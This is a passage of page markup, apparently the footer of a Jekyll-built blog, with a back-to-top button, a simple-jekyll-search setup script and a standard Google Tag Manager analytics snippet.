aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script> <script async src="https://www.googletagmanager.com/gtag/js?id="></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); </script>
